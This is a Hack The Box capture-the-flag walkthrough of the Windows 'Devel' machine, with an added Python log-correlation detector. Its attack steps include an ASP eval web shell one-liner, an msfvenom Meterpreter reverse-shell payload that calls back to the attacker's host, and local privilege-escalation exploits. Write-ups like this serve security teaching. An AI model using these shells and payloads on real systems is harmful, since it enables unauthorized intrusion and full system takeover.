Hack The Box Walkthrough – Devel

Difficulty: Easy
OS: Windows
Points: 20
Author: Hack The Box
Writeup by: Nikita


🧠 Introduction

In this walkthrough, we’ll exploit the Devel machine from Hack The Box. This is one of the most beginner-friendly Windows boxes, making it perfect for those starting out with penetration testing.

Let’s get hacking! 💻


🔎 Step 1: Reconnaissance

Start with an aggressive Nmap scan (-A enables OS detection, version detection, default scripts and traceroute) to discover open ports and services.

nmap -T4 -A -n 10.10.10.5

🔍 Nmap Output:

  • FTP (21) is open with anonymous login allowed.
  • HTTP (80) runs Microsoft IIS 7.5.

Let’s explore them one by one.


📁 Step 2: Anonymous FTP Access

Connect to FTP using anonymous credentials:

ftp 10.10.10.5

Login with:

Name: anonymous
Password: [anything]

Once logged in, you’ll see a writable directory with a folder called aspnet_client.

Try uploading a simple file:

put test.txt

✅ Upload succeeds! We can upload arbitrary files to the web root.


🕸️ Step 3: Gaining Web Shell Access

The IIS server is likely serving files from the FTP-upload directory. Let’s confirm this by uploading an ASP web shell.

🛠️ Generate an ASP web shell:

You can use a simple one-liner:

<%eval request("cmd")%>

Save it as p1.aspx.

echo "<%eval request(\"cmd\")%>" > p1.aspx

Upload the shell via FTP:

put p1.aspx

Now, access it via browser:

http://10.10.10.5/p1.aspx?cmd=whoami

🎉 Success! You should see something like:

iis apppool\web
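
From the defender's side, Steps 2 and 3 leave a trace in two logs: a successful FTP STOR of a script file, followed by an HTTP request for the same path. The Python example below is added here and is not part of the original write-up. It correlates the two W3C logs, assuming the FTP root and the web root are the same directory (as on this box); the log lines, the client address 10.10.14.7, the extension list and the 24-hour window are constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed W3C sample logs; field order is read from the #Fields header.
# 10.10.14.7 is a placeholder client address, not taken from the walkthrough.
FTP_LOG = """#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2024-01-10 09:14:02 10.10.14.7 anonymous STOR /test.txt 226
2024-01-10 09:15:40 10.10.14.7 anonymous STOR /p1.aspx 226
2024-01-10 09:16:05 10.10.14.7 anonymous STOR /denied.aspx 550
"""
HTTP_LOG = """#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-01-10 09:13:00 GET /iisstart.htm - 10.10.14.7 200
2024-01-10 09:16:30 GET /p1.aspx cmd=whoami 10.10.14.7 200
"""
SCRIPT_EXT = (".asp", ".aspx", ".ashx", ".asmx", ".cer", ".asa")  # types IIS may execute
WINDOW = timedelta(hours=24)  # assumed correlation window


def parse_w3c(text):
    """Yield one dict per log entry, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
            yield row


def uploaded_then_executed(ftp_text, http_text):
    """Return alerts for script files stored over FTP and later served over HTTP."""
    uploads = {}
    for r in parse_w3c(ftp_text):
        path = r["cs-uri-stem"].lower()
        if r["cs-method"] == "STOR" and r["sc-status"] == "226" and path.endswith(SCRIPT_EXT):
            uploads[path] = r  # keep the latest successful upload of each path
    alerts = []
    for r in parse_w3c(http_text):
        up = uploads.get(r["cs-uri-stem"].lower())
        if up and r["sc-status"] == "200" and timedelta(0) <= r["ts"] - up["ts"] <= WINDOW:
            alerts.append({"path": up["cs-uri-stem"], "ftp_user": up["cs-username"],
                           "uploader": up["c-ip"], "requester": r["c-ip"],
                           "delay_s": int((r["ts"] - up["ts"]).total_seconds())})
    return alerts


if __name__ == "__main__":
    for alert in uploaded_then_executed(FTP_LOG, HTTP_LOG):
        print(alert)
```

The plain-text upload and the rejected STOR (550) are ignored; only the stored script that is then served with a 200 raises an alert.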

🚀 Step 4: Getting a Reverse Shell

Now let’s upgrade our shell to a more interactive one using a reverse shell payload.

🔧 Generate Reverse Shell (MSFVenom):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -f asp > revshell.aspx

Replace YOUR_IP with your VPN IP.

Upload the revshell.aspx file via FTP:

put revshell.aspx

Start a listener on your system:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST YOUR_IP
set LPORT 4444
run

Then visit:

http://10.10.10.5/revshell.aspx

💥 You’ll get a Meterpreter shell!


🔐 Step 5: Privilege Escalation

🔎 Basic Enumeration

In Meterpreter, get a standard shell:

shell

Check user context:

whoami

You’ll see:

iis apppool\web

Let’s check the OS version:

systeminfo

Look for the following in the output:

OS Name:                   Microsoft Windows 7 ...
Hotfix(s): [None]

No hotfixes? That’s a red flag. 🔥

Let’s check for public exploits.


🧨 Step 6: Exploiting Vulnerability (MS10-015 / MS11-046)

We can use MS11-046 or MS10-015 (KiTrap0D) for privilege escalation on Windows 7.

To make it easy, let’s use Windows Exploit Suggester.

Download and run it with the systeminfo output:

./windows-exploit-suggester.py --database 2023-XX-XX-mssb.csv --systeminfo systeminfo.txt

It suggests MS10-015 as a valid exploit.

You can use a precompiled executable from trusted sources (e.g., compiled exploits repo).

⚠️ Always test exploits in safe environments. Do not run random .exes on your host.

Upload the exploit via FTP or Meterpreter.

Run it on the target and get SYSTEM access!


🧾 Step 7: Capture the Flags

Once you have SYSTEM access, grab the flags!

User flag:

cd C:\Users\Public\Desktop
type user.txt

Root flag:

cd C:\Users\Administrator\Desktop
type root.txt

🔥 Done!


🧠 Final Thoughts

Devel is a great beginner-friendly box that teaches:

  • FTP misconfigurations
  • IIS hosting quirks
  • Simple reverse shell payloads
  • Basic Windows privilege escalation

📌 Key Takeaways

  • Always check for anonymous FTP + HTTP combinations.
  • Test file uploads for shell access.
  • Use msfvenom for quick reverse shells.
  • Learn how to spot unpatched systems for escalation.

If you found this helpful, follow me on Medium and visit hackingwit.com for more write-ups like this!

Happy Hacking! 🧑‍💻
